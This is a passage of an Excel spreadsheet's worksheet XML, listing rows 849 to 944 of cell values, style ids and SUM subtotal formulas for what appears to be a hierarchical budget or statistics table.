      <c r="A849" s="10"/>
      <c r="B849" s="10"/>
      <c r="C849" s="28"/>
      <c r="D849" s="10" t="s">
        <v>5562</v>
      </c>
      <c r="E849" s="11" t="s">
        <v>3639</v>
      </c>
      <c r="F849" s="12">
        <f>F850+F876+F901+F929+F940+F947+F954+F957</f>
        <v>45369</v>
      </c>
    </row>
    <row r="850" spans="1:6">
      <c r="A850" s="10"/>
      <c r="B850" s="10"/>
      <c r="C850" s="28"/>
      <c r="D850" s="10" t="s">
        <v>5563</v>
      </c>
      <c r="E850" s="11" t="s">
        <v>3640</v>
      </c>
      <c r="F850" s="12">
        <f>SUM(F851:F875)</f>
        <v>14744</v>
      </c>
    </row>
    <row r="851" spans="1:6">
      <c r="A851" s="10"/>
      <c r="B851" s="10"/>
      <c r="C851" s="28"/>
      <c r="D851" s="10" t="s">
        <v>5564</v>
      </c>
      <c r="E851" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F851" s="17">
        <v>4824</v>
      </c>
    </row>
    <row r="852" spans="1:6">
      <c r="A852" s="10"/>
      <c r="B852" s="10"/>
      <c r="C852" s="28"/>
      <c r="D852" s="10" t="s">
        <v>5565</v>
      </c>
      <c r="E852" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F852" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="853" spans="1:6">
      <c r="A853" s="10"/>
      <c r="B853" s="10"/>
      <c r="C853" s="28"/>
      <c r="D853" s="10" t="s">
        <v>5566</v>
      </c>
      <c r="E853" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F853" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="854" spans="1:6">
      <c r="A854" s="10"/>
      <c r="B854" s="10"/>
      <c r="C854" s="28"/>
      <c r="D854" s="10" t="s">
        <v>5567</v>
      </c>
      <c r="E854" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F854" s="17">
        <v>296</v>
      </c>
    </row>
    <row r="855" spans="1:6">
      <c r="A855" s="10"/>
      <c r="B855" s="10"/>
      <c r="C855" s="28"/>
      <c r="D855" s="10" t="s">
        <v>5568</v>
      </c>
      <c r="E855" s="16" t="s">
        <v>3641</v>
      </c>
      <c r="F855" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="856" spans="1:6">
      <c r="A856" s="10"/>
      <c r="B856" s="10"/>
      <c r="C856" s="28"/>
      <c r="D856" s="10" t="s">
        <v>5569</v>
      </c>
      <c r="E856" s="16" t="s">
        <v>3642</v>
      </c>
      <c r="F856" s="17">
        <v>42</v>
      </c>
    </row>
    <row r="857" spans="1:6">
      <c r="A857" s="10"/>
      <c r="B857" s="10"/>
      <c r="C857" s="28"/>
      <c r="D857" s="10" t="s">
        <v>5570</v>
      </c>
      <c r="E857" s="16" t="s">
        <v>3643</v>
      </c>
      <c r="F857" s="17">
        <v>391</v>
      </c>
    </row>
    <row r="858" spans="1:6">
      <c r="A858" s="10"/>
      <c r="B858" s="10"/>
      <c r="C858" s="28"/>
      <c r="D858" s="10" t="s">
        <v>5571</v>
      </c>
      <c r="E858" s="16" t="s">
        <v>3644</v>
      </c>
      <c r="F858" s="17">
        <v>45</v>
      </c>
    </row>
    <row r="859" spans="1:6">
      <c r="A859" s="10"/>
      <c r="B859" s="10"/>
      <c r="C859" s="28"/>
      <c r="D859" s="10" t="s">
        <v>5572</v>
      </c>
      <c r="E859" s="16" t="s">
        <v>3645</v>
      </c>
      <c r="F859" s="17">
        <v>5</v>
      </c>
    </row>
    <row r="860" spans="1:6">
      <c r="A860" s="10"/>
      <c r="B860" s="10"/>
      <c r="C860" s="28"/>
      <c r="D860" s="10" t="s">
        <v>5573</v>
      </c>
      <c r="E860" s="16" t="s">
        <v>3646</v>
      </c>
      <c r="F860" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="861" spans="1:6">
      <c r="A861" s="10"/>
      <c r="B861" s="10"/>
      <c r="C861" s="28"/>
      <c r="D861" s="10" t="s">
        <v>5574</v>
      </c>
      <c r="E861" s="16" t="s">
        <v>3647</v>
      </c>
      <c r="F861" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="862" spans="1:6">
      <c r="A862" s="10"/>
      <c r="B862" s="10"/>
      <c r="C862" s="28"/>
      <c r="D862" s="10" t="s">
        <v>5575</v>
      </c>
      <c r="E862" s="16" t="s">
        <v>3648</v>
      </c>
      <c r="F862" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="863" spans="1:6">
      <c r="A863" s="10"/>
      <c r="B863" s="10"/>
      <c r="C863" s="28"/>
      <c r="D863" s="10" t="s">
        <v>5576</v>
      </c>
      <c r="E863" s="16" t="s">
        <v>3649</v>
      </c>
      <c r="F863" s="17">
        <v>11</v>
      </c>
    </row>
    <row r="864" spans="1:6">
      <c r="A864" s="10"/>
      <c r="B864" s="10"/>
      <c r="C864" s="28"/>
      <c r="D864" s="10" t="s">
        <v>5577</v>
      </c>
      <c r="E864" s="16" t="s">
        <v>3650</v>
      </c>
      <c r="F864" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="865" spans="1:6">
      <c r="A865" s="10"/>
      <c r="B865" s="10"/>
      <c r="C865" s="28"/>
      <c r="D865" s="10" t="s">
        <v>5578</v>
      </c>
      <c r="E865" s="16" t="s">
        <v>3651</v>
      </c>
      <c r="F865" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="866" spans="1:6">
      <c r="A866" s="10"/>
      <c r="B866" s="10"/>
      <c r="C866" s="28"/>
      <c r="D866" s="10" t="s">
        <v>5579</v>
      </c>
      <c r="E866" s="16" t="s">
        <v>3652</v>
      </c>
      <c r="F866" s="17">
        <v>614</v>
      </c>
    </row>
    <row r="867" spans="1:6">
      <c r="A867" s="10"/>
      <c r="B867" s="10"/>
      <c r="C867" s="28"/>
      <c r="D867" s="10" t="s">
        <v>5580</v>
      </c>
      <c r="E867" s="16" t="s">
        <v>3653</v>
      </c>
      <c r="F867" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="868" spans="1:6">
      <c r="A868" s="10"/>
      <c r="B868" s="10"/>
      <c r="C868" s="28"/>
      <c r="D868" s="10" t="s">
        <v>5581</v>
      </c>
      <c r="E868" s="16" t="s">
        <v>3654</v>
      </c>
      <c r="F868" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="869" spans="1:6">
      <c r="A869" s="10"/>
      <c r="B869" s="10"/>
      <c r="C869" s="28"/>
      <c r="D869" s="10" t="s">
        <v>5582</v>
      </c>
      <c r="E869" s="16" t="s">
        <v>3655</v>
      </c>
      <c r="F869" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="870" spans="1:6">
      <c r="A870" s="10"/>
      <c r="B870" s="10"/>
      <c r="C870" s="28"/>
      <c r="D870" s="10" t="s">
        <v>5583</v>
      </c>
      <c r="E870" s="16" t="s">
        <v>3656</v>
      </c>
      <c r="F870" s="17">
        <v>213</v>
      </c>
    </row>
    <row r="871" spans="1:6">
      <c r="A871" s="10"/>
      <c r="B871" s="10"/>
      <c r="C871" s="28"/>
      <c r="D871" s="10" t="s">
        <v>5584</v>
      </c>
      <c r="E871" s="16" t="s">
        <v>3657</v>
      </c>
      <c r="F871" s="17">
        <v>11</v>
      </c>
    </row>
    <row r="872" spans="1:6">
      <c r="A872" s="10"/>
      <c r="B872" s="10"/>
      <c r="C872" s="28"/>
      <c r="D872" s="10" t="s">
        <v>5585</v>
      </c>
      <c r="E872" s="16" t="s">
        <v>3658</v>
      </c>
      <c r="F872" s="17">
        <v>2</v>
      </c>
    </row>
    <row r="873" spans="1:6">
      <c r="A873" s="10"/>
      <c r="B873" s="10"/>
      <c r="C873" s="28"/>
      <c r="D873" s="10" t="s">
        <v>5586</v>
      </c>
      <c r="E873" s="16" t="s">
        <v>3659</v>
      </c>
      <c r="F873" s="17">
        <v>1</v>
      </c>
    </row>
    <row r="874" spans="1:6">
      <c r="A874" s="10"/>
      <c r="B874" s="10"/>
      <c r="C874" s="28"/>
      <c r="D874" s="10" t="s">
        <v>5587</v>
      </c>
      <c r="E874" s="16" t="s">
        <v>3660</v>
      </c>
      <c r="F874" s="17">
        <v>4014</v>
      </c>
    </row>
    <row r="875" spans="1:6">
      <c r="A875" s="10"/>
      <c r="B875" s="10"/>
      <c r="C875" s="28"/>
      <c r="D875" s="10" t="s">
        <v>5588</v>
      </c>
      <c r="E875" s="16" t="s">
        <v>3661</v>
      </c>
      <c r="F875" s="17">
        <v>4275</v>
      </c>
    </row>
    <row r="876" spans="1:6">
      <c r="A876" s="10"/>
      <c r="B876" s="10"/>
      <c r="C876" s="28"/>
      <c r="D876" s="10" t="s">
        <v>5589</v>
      </c>
      <c r="E876" s="11" t="s">
        <v>3662</v>
      </c>
      <c r="F876" s="12">
        <f>SUM(F877:F900)</f>
        <v>1335</v>
      </c>
    </row>
    <row r="877" spans="1:6">
      <c r="A877" s="10"/>
      <c r="B877" s="10"/>
      <c r="C877" s="28"/>
      <c r="D877" s="10" t="s">
        <v>5590</v>
      </c>
      <c r="E877" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F877" s="17">
        <v>4</v>
      </c>
    </row>
    <row r="878" spans="1:6">
      <c r="A878" s="10"/>
      <c r="B878" s="10"/>
      <c r="C878" s="28"/>
      <c r="D878" s="10" t="s">
        <v>5591</v>
      </c>
      <c r="E878" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F878" s="17">
        <v>30</v>
      </c>
    </row>
    <row r="879" spans="1:6">
      <c r="A879" s="10"/>
      <c r="B879" s="10"/>
      <c r="C879" s="28"/>
      <c r="D879" s="10" t="s">
        <v>5592</v>
      </c>
      <c r="E879" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F879" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="880" spans="1:6">
      <c r="A880" s="10"/>
      <c r="B880" s="10"/>
      <c r="C880" s="28"/>
      <c r="D880" s="10" t="s">
        <v>5593</v>
      </c>
      <c r="E880" s="16" t="s">
        <v>3663</v>
      </c>
      <c r="F880" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="881" spans="1:6">
      <c r="A881" s="10"/>
      <c r="B881" s="10"/>
      <c r="C881" s="28"/>
      <c r="D881" s="10" t="s">
        <v>5594</v>
      </c>
      <c r="E881" s="16" t="s">
        <v>3664</v>
      </c>
      <c r="F881" s="17">
        <v>497</v>
      </c>
    </row>
    <row r="882" spans="1:6">
      <c r="A882" s="10"/>
      <c r="B882" s="10"/>
      <c r="C882" s="28"/>
      <c r="D882" s="10" t="s">
        <v>5595</v>
      </c>
      <c r="E882" s="16" t="s">
        <v>3665</v>
      </c>
      <c r="F882" s="17">
        <v>30</v>
      </c>
    </row>
    <row r="883" spans="1:6">
      <c r="A883" s="10"/>
      <c r="B883" s="10"/>
      <c r="C883" s="28"/>
      <c r="D883" s="10" t="s">
        <v>5596</v>
      </c>
      <c r="E883" s="16" t="s">
        <v>3666</v>
      </c>
      <c r="F883" s="17">
        <v>181</v>
      </c>
    </row>
    <row r="884" spans="1:6">
      <c r="A884" s="10"/>
      <c r="B884" s="10"/>
      <c r="C884" s="28"/>
      <c r="D884" s="10" t="s">
        <v>5597</v>
      </c>
      <c r="E884" s="16" t="s">
        <v>3667</v>
      </c>
      <c r="F884" s="17">
        <v>40</v>
      </c>
    </row>
    <row r="885" spans="1:6">
      <c r="A885" s="10"/>
      <c r="B885" s="10"/>
      <c r="C885" s="28"/>
      <c r="D885" s="10" t="s">
        <v>5598</v>
      </c>
      <c r="E885" s="16" t="s">
        <v>3668</v>
      </c>
      <c r="F885" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="886" spans="1:6">
      <c r="A886" s="10"/>
      <c r="B886" s="10"/>
      <c r="C886" s="28"/>
      <c r="D886" s="10" t="s">
        <v>5599</v>
      </c>
      <c r="E886" s="16" t="s">
        <v>3669</v>
      </c>
      <c r="F886" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="887" spans="1:6">
      <c r="A887" s="10"/>
      <c r="B887" s="10"/>
      <c r="C887" s="28"/>
      <c r="D887" s="10" t="s">
        <v>5600</v>
      </c>
      <c r="E887" s="16" t="s">
        <v>3670</v>
      </c>
      <c r="F887" s="17">
        <v>20</v>
      </c>
    </row>
    <row r="888" spans="1:6">
      <c r="A888" s="10"/>
      <c r="B888" s="10"/>
      <c r="C888" s="28"/>
      <c r="D888" s="10" t="s">
        <v>5601</v>
      </c>
      <c r="E888" s="16" t="s">
        <v>3671</v>
      </c>
      <c r="F888" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="889" spans="1:6">
      <c r="A889" s="10"/>
      <c r="B889" s="10"/>
      <c r="C889" s="28"/>
      <c r="D889" s="10" t="s">
        <v>5602</v>
      </c>
      <c r="E889" s="16" t="s">
        <v>3672</v>
      </c>
      <c r="F889" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="890" spans="1:6">
      <c r="A890" s="10"/>
      <c r="B890" s="10"/>
      <c r="C890" s="28"/>
      <c r="D890" s="10" t="s">
        <v>5603</v>
      </c>
      <c r="E890" s="16" t="s">
        <v>3673</v>
      </c>
      <c r="F890" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="891" spans="1:6">
      <c r="A891" s="10"/>
      <c r="B891" s="10"/>
      <c r="C891" s="28"/>
      <c r="D891" s="10" t="s">
        <v>5604</v>
      </c>
      <c r="E891" s="16" t="s">
        <v>3674</v>
      </c>
      <c r="F891" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="892" spans="1:6">
      <c r="A892" s="10"/>
      <c r="B892" s="10"/>
      <c r="C892" s="28"/>
      <c r="D892" s="10" t="s">
        <v>5605</v>
      </c>
      <c r="E892" s="16" t="s">
        <v>3675</v>
      </c>
      <c r="F892" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="893" spans="1:6">
      <c r="A893" s="10"/>
      <c r="B893" s="10"/>
      <c r="C893" s="28"/>
      <c r="D893" s="10" t="s">
        <v>5606</v>
      </c>
      <c r="E893" s="16" t="s">
        <v>3676</v>
      </c>
      <c r="F893" s="17">
        <v>451</v>
      </c>
    </row>
    <row r="894" spans="1:6">
      <c r="A894" s="10"/>
      <c r="B894" s="10"/>
      <c r="C894" s="28"/>
      <c r="D894" s="10" t="s">
        <v>5607</v>
      </c>
      <c r="E894" s="16" t="s">
        <v>3677</v>
      </c>
      <c r="F894" s="17">
        <v>28</v>
      </c>
    </row>
    <row r="895" spans="1:6">
      <c r="A895" s="10"/>
      <c r="B895" s="10"/>
      <c r="C895" s="28"/>
      <c r="D895" s="10" t="s">
        <v>5608</v>
      </c>
      <c r="E895" s="16" t="s">
        <v>3678</v>
      </c>
      <c r="F895" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="896" spans="1:6">
      <c r="A896" s="10"/>
      <c r="B896" s="10"/>
      <c r="C896" s="28"/>
      <c r="D896" s="10" t="s">
        <v>5609</v>
      </c>
      <c r="E896" s="16" t="s">
        <v>3679</v>
      </c>
      <c r="F896" s="17">
        <v>9</v>
      </c>
    </row>
    <row r="897" spans="1:6">
      <c r="A897" s="10"/>
      <c r="B897" s="10"/>
      <c r="C897" s="28"/>
      <c r="D897" s="10" t="s">
        <v>5610</v>
      </c>
      <c r="E897" s="16" t="s">
        <v>3680</v>
      </c>
      <c r="F897" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="898" spans="1:6">
      <c r="A898" s="10"/>
      <c r="B898" s="10"/>
      <c r="C898" s="28"/>
      <c r="D898" s="10" t="s">
        <v>5611</v>
      </c>
      <c r="E898" s="16" t="s">
        <v>3681</v>
      </c>
      <c r="F898" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="899" spans="1:6">
      <c r="A899" s="10"/>
      <c r="B899" s="10"/>
      <c r="C899" s="28"/>
      <c r="D899" s="10" t="s">
        <v>5612</v>
      </c>
      <c r="E899" s="16" t="s">
        <v>3647</v>
      </c>
      <c r="F899" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="900" spans="1:6">
      <c r="A900" s="10"/>
      <c r="B900" s="10"/>
      <c r="C900" s="28"/>
      <c r="D900" s="10" t="s">
        <v>5613</v>
      </c>
      <c r="E900" s="16" t="s">
        <v>3682</v>
      </c>
      <c r="F900" s="17">
        <v>45</v>
      </c>
    </row>
    <row r="901" spans="1:6">
      <c r="A901" s="10"/>
      <c r="B901" s="10"/>
      <c r="C901" s="28"/>
      <c r="D901" s="10" t="s">
        <v>5614</v>
      </c>
      <c r="E901" s="11" t="s">
        <v>3683</v>
      </c>
      <c r="F901" s="12">
        <f>SUM(F902:F928)</f>
        <v>5011</v>
      </c>
    </row>
    <row r="902" spans="1:6">
      <c r="A902" s="10"/>
      <c r="B902" s="10"/>
      <c r="C902" s="28"/>
      <c r="D902" s="10" t="s">
        <v>5615</v>
      </c>
      <c r="E902" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F902" s="17">
        <v>1725</v>
      </c>
    </row>
    <row r="903" spans="1:6">
      <c r="A903" s="10"/>
      <c r="B903" s="10"/>
      <c r="C903" s="28"/>
      <c r="D903" s="10" t="s">
        <v>5616</v>
      </c>
      <c r="E903" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F903" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="904" spans="1:6">
      <c r="A904" s="10"/>
      <c r="B904" s="10"/>
      <c r="C904" s="28"/>
      <c r="D904" s="10" t="s">
        <v>5617</v>
      </c>
      <c r="E904" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F904" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="905" spans="1:6">
      <c r="A905" s="10"/>
      <c r="B905" s="10"/>
      <c r="C905" s="28"/>
      <c r="D905" s="10" t="s">
        <v>5618</v>
      </c>
      <c r="E905" s="16" t="s">
        <v>3684</v>
      </c>
      <c r="F905" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="906" spans="1:6">
      <c r="A906" s="10"/>
      <c r="B906" s="10"/>
      <c r="C906" s="28"/>
      <c r="D906" s="10" t="s">
        <v>5619</v>
      </c>
      <c r="E906" s="16" t="s">
        <v>3685</v>
      </c>
      <c r="F906" s="17">
        <v>395</v>
      </c>
    </row>
    <row r="907" spans="1:6">
      <c r="A907" s="10"/>
      <c r="B907" s="10"/>
      <c r="C907" s="28"/>
      <c r="D907" s="10" t="s">
        <v>5620</v>
      </c>
      <c r="E907" s="16" t="s">
        <v>3686</v>
      </c>
      <c r="F907" s="17">
        <v>1040</v>
      </c>
    </row>
    <row r="908" spans="1:6">
      <c r="A908" s="10"/>
      <c r="B908" s="10"/>
      <c r="C908" s="28"/>
      <c r="D908" s="10" t="s">
        <v>5621</v>
      </c>
      <c r="E908" s="16" t="s">
        <v>3687</v>
      </c>
      <c r="F908" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="909" spans="1:6">
      <c r="A909" s="10"/>
      <c r="B909" s="10"/>
      <c r="C909" s="28"/>
      <c r="D909" s="10" t="s">
        <v>5622</v>
      </c>
      <c r="E909" s="16" t="s">
        <v>3688</v>
      </c>
      <c r="F909" s="17">
        <v>104</v>
      </c>
    </row>
    <row r="910" spans="1:6">
      <c r="A910" s="10"/>
      <c r="B910" s="10"/>
      <c r="C910" s="28"/>
      <c r="D910" s="10" t="s">
        <v>5623</v>
      </c>
      <c r="E910" s="16" t="s">
        <v>3689</v>
      </c>
      <c r="F910" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="911" spans="1:6">
      <c r="A911" s="10"/>
      <c r="B911" s="10"/>
      <c r="C911" s="28"/>
      <c r="D911" s="10" t="s">
        <v>5624</v>
      </c>
      <c r="E911" s="16" t="s">
        <v>3690</v>
      </c>
      <c r="F911" s="17">
        <v>234</v>
      </c>
    </row>
    <row r="912" spans="1:6">
      <c r="A912" s="10"/>
      <c r="B912" s="10"/>
      <c r="C912" s="28"/>
      <c r="D912" s="10" t="s">
        <v>5625</v>
      </c>
      <c r="E912" s="16" t="s">
        <v>3691</v>
      </c>
      <c r="F912" s="17">
        <v>57</v>
      </c>
    </row>
    <row r="913" spans="1:6">
      <c r="A913" s="10"/>
      <c r="B913" s="10"/>
      <c r="C913" s="28"/>
      <c r="D913" s="10" t="s">
        <v>5626</v>
      </c>
      <c r="E913" s="16" t="s">
        <v>3692</v>
      </c>
      <c r="F913" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="914" spans="1:6">
      <c r="A914" s="10"/>
      <c r="B914" s="10"/>
      <c r="C914" s="28"/>
      <c r="D914" s="10" t="s">
        <v>5627</v>
      </c>
      <c r="E914" s="16" t="s">
        <v>3693</v>
      </c>
      <c r="F914" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="915" spans="1:6">
      <c r="A915" s="10"/>
      <c r="B915" s="10"/>
      <c r="C915" s="28"/>
      <c r="D915" s="10" t="s">
        <v>5628</v>
      </c>
      <c r="E915" s="16" t="s">
        <v>3694</v>
      </c>
      <c r="F915" s="17">
        <v>208</v>
      </c>
    </row>
    <row r="916" spans="1:6">
      <c r="A916" s="10"/>
      <c r="B916" s="10"/>
      <c r="C916" s="28"/>
      <c r="D916" s="10" t="s">
        <v>5629</v>
      </c>
      <c r="E916" s="16" t="s">
        <v>3695</v>
      </c>
      <c r="F916" s="17">
        <v>25</v>
      </c>
    </row>
    <row r="917" spans="1:6">
      <c r="A917" s="10"/>
      <c r="B917" s="10"/>
      <c r="C917" s="28"/>
      <c r="D917" s="10" t="s">
        <v>5630</v>
      </c>
      <c r="E917" s="16" t="s">
        <v>3696</v>
      </c>
      <c r="F917" s="17">
        <v>16</v>
      </c>
    </row>
    <row r="918" spans="1:6">
      <c r="A918" s="10"/>
      <c r="B918" s="10"/>
      <c r="C918" s="28"/>
      <c r="D918" s="10" t="s">
        <v>5631</v>
      </c>
      <c r="E918" s="16" t="s">
        <v>3697</v>
      </c>
      <c r="F918" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="919" spans="1:6">
      <c r="A919" s="10"/>
      <c r="B919" s="10"/>
      <c r="C919" s="28"/>
      <c r="D919" s="10" t="s">
        <v>5632</v>
      </c>
      <c r="E919" s="16" t="s">
        <v>3698</v>
      </c>
      <c r="F919" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="920" spans="1:6">
      <c r="A920" s="10"/>
      <c r="B920" s="10"/>
      <c r="C920" s="28"/>
      <c r="D920" s="10" t="s">
        <v>5633</v>
      </c>
      <c r="E920" s="16" t="s">
        <v>3699</v>
      </c>
      <c r="F920" s="17">
        <v>22</v>
      </c>
    </row>
    <row r="921" spans="1:6">
      <c r="A921" s="10"/>
      <c r="B921" s="10"/>
      <c r="C921" s="28"/>
      <c r="D921" s="10" t="s">
        <v>5634</v>
      </c>
      <c r="E921" s="16" t="s">
        <v>3700</v>
      </c>
      <c r="F921" s="17">
        <v>718</v>
      </c>
    </row>
    <row r="922" spans="1:6">
      <c r="A922" s="10"/>
      <c r="B922" s="10"/>
      <c r="C922" s="28"/>
      <c r="D922" s="10" t="s">
        <v>5635</v>
      </c>
      <c r="E922" s="16" t="s">
        <v>3701</v>
      </c>
      <c r="F922" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="923" spans="1:6">
      <c r="A923" s="10"/>
      <c r="B923" s="10"/>
      <c r="C923" s="28"/>
      <c r="D923" s="10" t="s">
        <v>5636</v>
      </c>
      <c r="E923" s="16" t="s">
        <v>3675</v>
      </c>
      <c r="F923" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="924" spans="1:6">
      <c r="A924" s="10"/>
      <c r="B924" s="10"/>
      <c r="C924" s="28"/>
      <c r="D924" s="10" t="s">
        <v>5637</v>
      </c>
      <c r="E924" s="16" t="s">
        <v>3702</v>
      </c>
      <c r="F924" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="925" spans="1:6">
      <c r="A925" s="10"/>
      <c r="B925" s="10"/>
      <c r="C925" s="28"/>
      <c r="D925" s="10" t="s">
        <v>5638</v>
      </c>
      <c r="E925" s="16" t="s">
        <v>3703</v>
      </c>
      <c r="F925" s="17">
        <v>46</v>
      </c>
    </row>
    <row r="926" spans="1:6">
      <c r="A926" s="10"/>
      <c r="B926" s="10"/>
      <c r="C926" s="28"/>
      <c r="D926" s="10" t="s">
        <v>5639</v>
      </c>
      <c r="E926" s="16" t="s">
        <v>3704</v>
      </c>
      <c r="F926" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="927" spans="1:6">
      <c r="A927" s="10"/>
      <c r="B927" s="10"/>
      <c r="C927" s="28"/>
      <c r="D927" s="10" t="s">
        <v>5640</v>
      </c>
      <c r="E927" s="16" t="s">
        <v>3705</v>
      </c>
      <c r="F927" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="928" spans="1:6">
      <c r="A928" s="10"/>
      <c r="B928" s="10"/>
      <c r="C928" s="28"/>
      <c r="D928" s="10" t="s">
        <v>5641</v>
      </c>
      <c r="E928" s="16" t="s">
        <v>3706</v>
      </c>
      <c r="F928" s="17">
        <v>421</v>
      </c>
    </row>
    <row r="929" spans="1:6">
      <c r="A929" s="10"/>
      <c r="B929" s="10"/>
      <c r="C929" s="28"/>
      <c r="D929" s="10" t="s">
        <v>5642</v>
      </c>
      <c r="E929" s="11" t="s">
        <v>3707</v>
      </c>
      <c r="F929" s="12">
        <f>SUM(F930:F939)</f>
        <v>11681</v>
      </c>
    </row>
    <row r="930" spans="1:6">
      <c r="A930" s="10"/>
      <c r="B930" s="10"/>
      <c r="C930" s="28"/>
      <c r="D930" s="10" t="s">
        <v>5643</v>
      </c>
      <c r="E930" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F930" s="17">
        <v>272</v>
      </c>
    </row>
    <row r="931" spans="1:6">
      <c r="A931" s="10"/>
      <c r="B931" s="10"/>
      <c r="C931" s="28"/>
      <c r="D931" s="10" t="s">
        <v>5644</v>
      </c>
      <c r="E931" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F931" s="17">
        <v>50</v>
      </c>
    </row>
    <row r="932" spans="1:6">
      <c r="A932" s="10"/>
      <c r="B932" s="10"/>
      <c r="C932" s="28"/>
      <c r="D932" s="10" t="s">
        <v>5645</v>
      </c>
      <c r="E932" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F932" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="933" spans="1:6">
      <c r="A933" s="10"/>
      <c r="B933" s="10"/>
      <c r="C933" s="28"/>
      <c r="D933" s="10" t="s">
        <v>5646</v>
      </c>
      <c r="E933" s="16" t="s">
        <v>3708</v>
      </c>
      <c r="F933" s="17">
        <v>1018</v>
      </c>
    </row>
    <row r="934" spans="1:6">
      <c r="A934" s="10"/>
      <c r="B934" s="10"/>
      <c r="C934" s="28"/>
      <c r="D934" s="10" t="s">
        <v>5647</v>
      </c>
      <c r="E934" s="16" t="s">
        <v>3709</v>
      </c>
      <c r="F934" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="935" spans="1:6">
      <c r="A935" s="10"/>
      <c r="B935" s="10"/>
      <c r="C935" s="28"/>
      <c r="D935" s="10" t="s">
        <v>5648</v>
      </c>
      <c r="E935" s="16" t="s">
        <v>3710</v>
      </c>
      <c r="F935" s="17">
        <v>85</v>
      </c>
    </row>
    <row r="936" spans="1:6">
      <c r="A936" s="10"/>
      <c r="B936" s="10"/>
      <c r="C936" s="28"/>
      <c r="D936" s="10" t="s">
        <v>5649</v>
      </c>
      <c r="E936" s="16" t="s">
        <v>3711</v>
      </c>
      <c r="F936" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="937" spans="1:6">
      <c r="A937" s="10"/>
      <c r="B937" s="10"/>
      <c r="C937" s="28"/>
      <c r="D937" s="10" t="s">
        <v>5650</v>
      </c>
      <c r="E937" s="16" t="s">
        <v>3712</v>
      </c>
      <c r="F937" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="938" spans="1:6">
      <c r="A938" s="10"/>
      <c r="B938" s="10"/>
      <c r="C938" s="28"/>
      <c r="D938" s="10" t="s">
        <v>5651</v>
      </c>
      <c r="E938" s="16" t="s">
        <v>3713</v>
      </c>
      <c r="F938" s="17">
        <v>235</v>
      </c>
    </row>
    <row r="939" spans="1:6">
      <c r="A939" s="10"/>
      <c r="B939" s="10"/>
      <c r="C939" s="28"/>
      <c r="D939" s="10" t="s">
        <v>5652</v>
      </c>
      <c r="E939" s="16" t="s">
        <v>3714</v>
      </c>
      <c r="F939" s="17">
        <v>10021</v>
      </c>
    </row>
    <row r="940" spans="1:6">
      <c r="A940" s="10"/>
      <c r="B940" s="10"/>
      <c r="C940" s="28"/>
      <c r="D940" s="10" t="s">
        <v>5653</v>
      </c>
      <c r="E940" s="11" t="s">
        <v>3715</v>
      </c>
      <c r="F940" s="12">
        <f>SUM(F941:F946)</f>
        <v>9588</v>
      </c>
    </row>
    <row r="941" spans="1:6">
      <c r="A941" s="10"/>
      <c r="B941" s="10"/>
      <c r="C941" s="28"/>
      <c r="D941" s="10" t="s">
        <v>5654</v>
      </c>
      <c r="E941" s="16" t="s">
        <v>3716</v>
      </c>
      <c r="F941" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="942" spans="1:6">
      <c r="A942" s="10"/>
      <c r="B942" s="10"/>
      <c r="C942" s="28"/>
      <c r="D942" s="10" t="s">
        <v>5655</v>
      </c>
      <c r="E942" s="16" t="s">
        <v>3717</v>
      </c>
      <c r="F942" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="943" spans="1:6">
      <c r="A943" s="10"/>
      <c r="B943" s="10"/>
      <c r="C943" s="28"/>
      <c r="D943" s="10" t="s">
        <v>5656</v>
      </c>
      <c r="E943" s="16" t="s">
        <v>3718</v>
      </c>
      <c r="F943" s="17">
        <v>9588</v>
      </c>
    </row>
    <row r="944" spans="1:6">
      <c r="A944" s="10"/>
      <c r="B944" s="10"/>
      <c r="C944" s="28"/>
